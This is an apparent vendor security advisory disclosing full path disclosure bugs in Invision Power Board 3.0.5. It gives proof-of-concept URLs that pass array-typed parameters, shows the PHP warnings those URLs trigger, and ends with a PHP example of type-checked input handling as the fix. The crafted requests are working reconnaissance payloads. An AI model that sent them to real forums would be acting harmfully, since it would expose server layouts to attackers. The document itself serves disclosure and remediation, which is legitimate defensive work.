[MajorSecurity SA-067]Invision Power Board 3.0.5 - full path disclosures
Details
=======
Product: Invision Power Board 3.x
Security-Risk: low
Remote-Exploit: yes
Vendor-URL: http://www.invisionpower.com
Vendor-Status: informed
Advisory-Status: published
Credits
============
Discovered by: David Vieira-Kurz
http://www.majorsecurity.net/penetrationstest.php
Affected Products:
----------------------------
Invision Power Board 3.0.5 and prior
Introduction
============
"Invision Power Board is a widely-used general-purpose forums script."
More Details
============
1. Full Path Disclosure
-----------------------------------
Several PHP functions take strings as parameters and raise a warning when the value passed is an array rather than a string. To obtain the path of the current script, an attacker simply passes the argument as an array instead of the expected string and reads the PHP warning, which includes the full path of the running script.
Proof of concept:
-----------------------------------
/index.php?showforum[]=2
Warning: Illegal offset type in
[PATH_TO_IPB]/admin/applications/forums/sources/classes/forums/class_forums.php
on line 631
/index.php?app=core&module=usercp&tab[]=blog&area[]=settings
Warning: Illegal offset type in isset or empty in
[PATH_TO_IPB]/admin/sources/base/core.php on line 2169
/admin/index.php?adsess=151977c397511a9cad960c71e0575e23&old_adsess=&app[]=core&
Warning: Constants may only evaluate to scalar values in
/admin/sources/base/ipsRegistry.php on line 1476
Warning: Illegal offset type in isset or empty in
[PATH_TO_IPB]/admin/sources/base/core.php on line 2240
/index.php?adsess=2809f1f10d21bcfc90c65b600f68d2e4&app=forums&&module=forums&section=forums&messageinabottleacp[]=X
Warning: urldecode() expects parameter 1 to be string, array given in
[PATH_TO_IPB]/admin/sources/classes/class_admin_functions.php on line 73
Solution
================
I would NOT recommend reacting with "security through obscurity" by just turning off error messages and error reporting. This is not a solution, because many users run the board on shared hosting where they cannot modify the php.ini configuration file; on some shared hosting servers even ini_set() is forbidden. Those installations would still have the full path disclosure.
Workaround
================
I would recommend going meticulously through the code and forcing PHP to cast the data to the desired type, in this case with (string) casts, to eliminate the notice or warning messages.
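The following is an added illustration of the request-handling pattern described above and of the type-enforcing workaround; it is not Invision Power Board code. The function names, the $forums table and the sample requests are constructed. One caveat the workaround needs: a bare (string) cast of an array yields the literal "Array" and, since PHP 5.4, an "Array to string conversion" notice that would again carry the script path, so the hardened helper checks the type first and casts only scalars.

```php
<?php
// Added example, not IPB code: vulnerable lookup beside a hardened one.
// $forums, the function names and the sample requests are constructed.

// Constructed forum table standing in for the board's data.
$forums = ['2' => 'General Discussion'];

// Vulnerable pattern: the raw query value is used as an array key and passed
// to a string-only function. PHP parses "?showforum[]=2" into an array, so
// urldecode() warns "expects parameter 1 to be string, array given" and
// isset($forums[$id]) warns "Illegal offset type in isset or empty"; with
// display_errors on, both messages include the absolute script path
// (PHP 8 throws a TypeError instead, which reveals the path if uncaught).
function lookupForumVulnerable(array $get, array $forums): ?string
{
    $id = $get['showforum'] ?? '';
    $id = urldecode($id);
    return isset($forums[$id]) ? $forums[$id] : null;
}

// Hardened pattern: accept only scalars and cast to the expected type before
// the value reaches key lookups or string functions. Arrays (and objects)
// fall back to the default instead of being cast, so no notice is emitted.
function queryString(array $get, string $key, string $default = ''): string
{
    $value = $get[$key] ?? $default;
    return is_scalar($value) ? (string) $value : $default;
}

// Numeric identifiers get a second filter: digits only, otherwise default.
function queryInt(array $get, string $key, int $default = 0): int
{
    $value = queryString($get, $key, (string) $default);
    return ctype_digit($value) ? (int) $value : $default;
}

function lookupForumHardened(array $get, array $forums): ?string
{
    $id = queryInt($get, 'showforum');
    return $forums[$id] ?? null;
}

// Constructed requests: the expected shape and the array-valued shape that
// "?showforum[]=2" produces in $_GET (no real request is issued).
$samples = [
    'string value' => ['showforum' => '2'],
    'array value'  => ['showforum' => ['2']],
];

foreach ($samples as $label => $get) {
    // The hardened lookup handles the array-valued request silently.
    $result = lookupForumHardened($get, $forums);
    printf("%-12s -> %s\n", $label, $result ?? 'rejected');
}
```

Run with `php example.php`: the string-shaped request resolves to the forum name, the array-shaped one is rejected without any PHP warning. Turning display_errors off and log_errors on remains worthwhile as defence in depth where the php.ini is under your control, but the code-level check is what removes the dependency on that setting.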
MajorSecurity
================
MajorSecurity is a German penetration testing and security research company which focuses on web application security. We offer professional penetration tests, security audits and source code reviews.
--
David Vieira-Kurz (CTO)
Senior IT Security Consultant
MajorSecurity
Phone: +49 151 24 132 139
Web: http://www.majorsecurity.net
This e-mail (including its attachments) is confidential and intended only for the addressee(s).